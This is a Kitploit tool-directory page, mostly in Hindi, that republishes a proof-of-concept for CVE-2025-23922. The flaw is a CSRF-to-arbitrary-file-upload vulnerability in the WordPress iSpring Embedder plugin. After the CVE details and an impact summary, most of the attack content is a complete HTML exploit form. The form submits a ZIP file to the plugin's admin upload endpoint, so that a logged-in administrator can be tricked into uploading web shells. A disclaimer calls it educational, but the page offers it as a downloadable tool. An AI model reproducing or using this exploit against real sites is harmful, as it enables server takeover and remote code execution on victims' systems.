Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-23922 — WordPress iSpring Embedder प्लगइन <= 1.0 - CSRF से मनमाना फ़ाइल अपलोड भेद्यता | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-23922
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubnxploited/cve-2025-23922

CVE-2025-23922

WordPress iSpring Embedder प्लगइन <= 1.0 - CSRF से मनमाना फ़ाइल अपलोड भेद्यता

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-23922 - WordPress iSpring Embedder CSRF से मनमानी फ़ाइल अपलोड

📌 CVE विवरण

  • CVE ID: CVE-2025-23922
  • प्रकाशित: 2025-01-16
  • प्रभावित प्लगइन: WordPress iSpring Embedder प्लगइन
  • प्रभावित संस्करण: <= 1.0
  • प्लगइन के लेखक: Harsh
  • भेद्यता प्रकार: क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) → मनमानी फ़ाइल अपलोड
  • CWE ID: CWE-352: क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF)
  • CVSS स्कोर: 10.0 (गंभीर)
  • वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

🔥 विवरण

iSpring Embedder WordPress प्लगइन में एक CSRF भेद्यता एक अप्रमाणित दूरस्थ हमलावर को प्रमाणित व्यवस्थापक को धोखा देकर सर्वर पर मनमानी फ़ाइलें (जैसे PHP वेब शेल) अपलोड करने की अनुमति देती है।

कमजोर एंडपॉइंट किसी भी CSRF सुरक्षा को लागू नहीं करता है, और फ़ाइल अपलोड सुविधा .zip फ़ाइलों को स्वीकार करती है, जिन्हें निम्न स्थान पर निकाला जाता है:

root@kitploit:~
/wp-content/uploads/iSpring_embedder/

💡 प्रभाव

एक हमलावर निम्न कार्य कर सकता है:

  • बिना प्रमाणीकरण के फ़ाइल अपलोड ट्रिगर कर सकता है।
  • ZIP आर्काइव के अंदर एक दुर्भावनापूर्ण PHP फ़ाइल अपलोड करके रिमोट कोड निष्पादन (RCE) प्राप्त कर सकता है।
  • इसे एक क्राफ्टेड वेब शेल के साथ जोड़कर पूरे वेब सर्वर से समझौता कर सकता है।

🚀 प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट (HTML)

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>CSRF File Upload Exploit</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f4f4f4;
      padding: 20px;
    }
    .container {
      background: #fff;
      padding: 25px;
      border-radius: 10px;
      box-shadow: 0 0 10px rgba(0,0,0,0.1);
      max-width: 600px;
      margin: auto;
    }
    h1 {
      color: #d9534f;
    }
    input[type="file"],
    input[type="submit"] {
      margin-top: 10px;
      padding: 10px;
      font-size: 16px;
    }
    .footer {
      margin-top: 30px;
      font-size: 14px;
      color: #777;
      text-align: center;
    }
  </style>
</head>
<body>
  <div class="container">
    <h1>CSRF Exploit – File Upload</h1>

    <p>
      This is a proof-of-concept (PoC) exploit for the following vulnerability:
    </p>
    <ul>
      <li><strong>Vulnerability:</strong> CSRF leading to Arbitrary File Upload</li>
      <li><strong>Plugin:</strong> iSpring Embedder for WordPress (<= v1.0)</li>
      <li><strong>CVE:</strong> CVE-2025-23922</li>
      <li><strong>Impact:</strong> Remote attackers can coerce an authenticated administrator to upload arbitrary files, potentially including web shells.</li>
      <li><strong>Upload Path:</strong> <code>/wp-content/uploads/iSpring_embedder/</code></li>
    </ul>

    <form id="csrfForm" action="http://wordpresssite/wp-admin/admin.php?page=ispring-embedder" method="POST" enctype="multipart/form-data">
      <label><strong>Select ZIP file to upload:</strong></label><br>
      <input type="file" name="zip_file" required><br>
      <input type="hidden" name="file_name" value="exploit_csrf">
      <input type="submit" name="submit_ispring_form" value="Upload File via CSRF">
    </form>

    <div class="footer">
      <p>
        Exploit for <strong>CSRF to Arbitrary File Upload vulnerability</strong><br>
        <strong>CVE-2025-23922</strong><br>
        Developed by <strong>Nxploit | Khaled Alenazi</strong>
      </p>
    </div>
  </div>
</body>
</html>


⚠️ अस्वीकरण

यह प्रूफ-ऑफ-कॉन्सेप्ट केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान किया गया है।
लेखक इस एक्सप्लॉइट के किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं है।

Nxploit | Khaled Alenazi
सुरक्षा शोधकर्ता और एक्सप्लॉइट डेवलपर
https://github.com/Nxploit

टूल डाउनलोड करें